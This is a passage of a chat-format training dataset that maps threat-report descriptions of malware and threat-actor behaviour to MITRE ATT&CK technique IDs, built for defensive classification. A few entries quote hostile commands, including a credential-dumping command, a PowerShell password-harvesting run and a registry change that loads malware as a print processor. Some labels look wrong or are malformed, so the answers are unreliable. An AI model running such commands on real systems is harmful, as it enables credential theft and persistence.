"user", "content": "Helminth has used a scheduled task for persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can collect data from the system, and can monitor changes in specified directories." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacSpy stores itself in \"~/Library/.DS_Stores/\"" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KeyBoy attempts to collect passwords from browsers." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used AdFind to enumerate domain groups." }, { "role": "assistant", "content": "T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can use Dropbox and GitHub for C2." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In one incident, the threat actor used the Wrapikatz tool (w.exe) with a usage statement that retrieves various passwords and Windows credentials from memory and compiles them in w.txt: c:\\programdata\\w.exe –w –l –c>>c:\\programdata\\w.txt In a separate incident, the threat actor used access provided by extensive web shell deployment to harvest account credentials: 2016-10-03T09:27:47 dir 2016-10-03T09:28:11 w64.log >ppp.log 2016-10-03T09:30:10 PowerShell.exe -ExecutionPolicy Bypass -File getpwd.ps1 >iistail.log In another example, BRONZE UNION leveraged the Kekeo credential abuse tool to exploit CVE-2014-6324, a vulnerability in Microsoft's implementation of the Kerberos network authentication protocol" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping', 'T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has added the Registry key `HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Print Processors\\UDPrint” /v Driver /d “spool.dll /f` to load malware as a Print Processor." }, { "role": "assistant", "content": "T1547.012 - Boot or Logon Autostart Execution: Print Processors" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SeaDuke is capable of uploading and downloading files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication. Table 4 shows the parameters sent to C2 server from the backdoor in the newer versions" }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, the threat actors renamed some tools and executables to appear as legitimate programs." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used legitimate web services including Pastebin, Dropbox, and GitHub for C2 communications." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Persistence: Creates a Windows RUN registry key for persistence. The name of the key is: \"Dropbox Update Setup\". This name was consistent in all the samples. This key points to the location of the Python-compiled binary in the %appdata% directory to ensure that it is started automatically each time the system is rebooted" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The backdoor also collects some rudimentary information about the compromised computer including some basic network adapter information, system version information, and language settings" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackEnergy is capable of taking screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLINDINGCAN has attempted to hide its payload by using legitimate file names such as \"iconcache.db\"." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used the legitimate mailing service Constant Contact to send phishing e-mails." }, { "role": "assistant", "content": "T1566.003 - Spearphishing via Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additionally, the attackers used a genuine code-signing certificate issued to a Cyprus-based company called Hermetica Digital Ltd" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses AES to encrypt network communication." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During CostaRicto, the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain." }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some variants of the Zeroaccess Trojan have been known to store data in Extended Attributes." }, { "role": "assistant", "content": "T1564.004 - Hide Artifacts: NTFS File Attributes" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a variant of NanoCore RAT that communicates with its C2 server over port 6666." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KillDisk overwrites the first sector of the Master Boot Record with “0x00”." }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has encrypted payloads and strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may use net view /domain to display hostnames of available systems on a network." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a scheduled task for persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One of these domains, facebook-apps[.]com, was identified in one of the malware samples associated with this IP address" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Responder captures hashes and credentials that are sent to the system after the name services have been poisoned." }, { "role": "assistant", "content": "T1040 - Network Sniffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Since FoggyWeb runs in the context of the main AD FS process, it inherits the AD FS service account permissions required to access the AD FS configuration database. This contrasts with tools such as ADFSDump that must be executed under the user context of the AD FS service account" }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The information that the malware gets from the victim machine can be the user name, the machine name, the domain where the machine belongs or, if not, the workgroup, the product name (operating system name), etc" }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang performs process discovery using \"tasklist\" commands." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak has used \"regsvr32.exe\" to launch malicious DLLs." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "First, several of these commands contain checks to determine the environment in order to use appropriate paths or commands. The ‘tasklist’ command will use a WMI query or the “ps” command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar’s ‘cmd’ command will run commands using “cmd.exe” for Windows systems and “/bin/bash” for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell has a command to open a file manager and explorer on the system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QAKBOT can use Regsvr32 to execute malicious DLLs" }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro has been delivered within ZIP or RAR password-protected archived files." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Actors executed malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths." }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system. APT32 also creates a Windows service to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "injects a DLL for into the explorer.exe process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has encrypted IP addresses used for \"Agent\" proxy hops with RC4." }, { "role": "assistant", "content": "T1001 - Data Obfuscation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In January, we saw a variant of the disk-wiping KillDisk malware hitting several financial institutions in Latin America. Last May, we uncovered a master boot record (MBR)-wiping malware in the same region" }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperStack can use Windows API's \"ConnectNamedPipe\" and \"WNetAddConnection2\" to detect incoming connections and connect to remote shares." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Reaver deletes the original dropped file from the victim." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Log keystrokes and the titles of open windows - Gather clipboard data and system information - Steal printer information and any documents that were sent to be printed - Record audio - Capture screenshots and webcam photos" }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Naikon has disguised malicious programs as Google Chrome, Adobe, and VMware executables." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Each user on a Mac can have a LaunchAgents folder in their own Library folder to specify code that should be run every time that user logs in. We can confirm this is the case with Green Lambert by running the implant, then checking the user’s LaunchAgents folder" }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remexi uses AutoIt and VBS scripts throughout its execution process." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses 443 for C2 communications." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker has performed DLL hijacking before execution." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates with its C2 server over HTTP." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It is responsible for executing commands in cmd.exe (later down in the functions, not seen in the screenshot, it looks for cmd.exe and executes it using CreateProcessA)" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conti can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stage2.exe is a beaconing implant that performs an HTTPS connection to download a JPG file hosted on Discord’s content delivery network (CDN). Discord’s CDN is a user-created service that allows users to host attachments and is not malicious. The hosted file is retrieved from the following URL" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An already public UAC bypass method is included in the binary. It doesn’t matter if the method will work or not since the process will exit. This is one more indication that the tool is still in development and there are plans to expand its capabilities" }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "the malicious DLL installed as a Print Processor) is stored as a file on disk; the modules are stored in the registry by the installer (from the CrLnc.dat file) and are described in Table 6" }, { "role": "assistant", "content": "T1547.012 - Boot or Logon Autostart Execution: Print Processors" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POSHSPY downloads and executes additional PowerShell code and Windows binaries." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EnvyScout has used folder icons for malicious files to lure victims into opening them." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWiper has the ability to receive a command parameter to sleep prior to carrying out destructive actions on a targeted host." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Diavol can use the ARP table to find remote hosts to scan." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can use \"net localgroup\" to list local groups on a system." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Unknown Logger is capable of recording keystrokes." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts C2 traffic with HTTPS and also encodes it with a single-byte XOR key." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT18 actors leverage legitimate credentials to log into external remote services." }, { "role": "assistant", "content": "T1078 - Valid Accounts', 'T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors used a compromised Office 365 service account with Global Administrator privileges to collect email from user inboxes." }, { "role": "assistant", "content": "T1078.002 - Domain Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 obtained PKI keys, certificate files and the private encryption key from an Active Directory Federation Services (AD FS) container to decrypt corresponding SAML signing certificates." }, { "role": "assistant", "content": "T1552.004 - Unsecured Credentials: Private Keys" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XLoader sets up an auto start by creating a new file with a random name in the LaunchAgents folder of the current user:" }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Both masscan and pnscan have been used before by TeamTNT actors. However, the addition of zgrab, a GoLang network scanner, marks the first time that a GoLang tool has been witnessed incorporated into TeamTNT’s TTPs. There was also an update to the masscan network scanner operation to include searching for TCP port 5555. This could indicate a new unknown target set for expanding TeamTNT cryptojacking operations. However, there is little evidence to support TeamTNT targeting Android devices" }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRatReporter spoofed itself as \"AlphaZawgyl_font.exe\", a specialized Unicode font." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Milan can use the API `DnsQuery_A` for DNS resolution." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BITTER has used TCP for C2 communications." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a tool that can enumerate the permissions associated with Windows groups." }, { "role": "assistant", "content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SOUNDBITE is capable of modifying the Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some samples have a module to use pass the ticket with Kerberos for authentication." }, { "role": "assistant", "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Password stealer and NTLM stealer modules in harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication. has also executed for further victim penetration." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware attempts to determine the installed version of .NET by querying the Registry." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Since this malicious extension is trying to pass for a legitimate Chrome plugin, Grandoreiro’s developer named it “Google Plugin” version 1.5.0. Visually, it adds a square button to the browser window instead of the “cookie” button on the original plugin" }, { "role": "assistant", "content": "T1176 - Browser Extensions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems." }, { "role": "assistant", "content": "T1187 - Forced Authentication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Misdat is capable of providing shell functionality to the attacker to execute commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleJeus has exfiltrated collected host information to a C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is used to poison name services to gather hashes and credentials from systems within a local network." }, { "role": "assistant", "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete employed some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A variant has used rundll32 for execution." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity can identify the hard disk volume serial number on a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbon can use HTTP in C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " 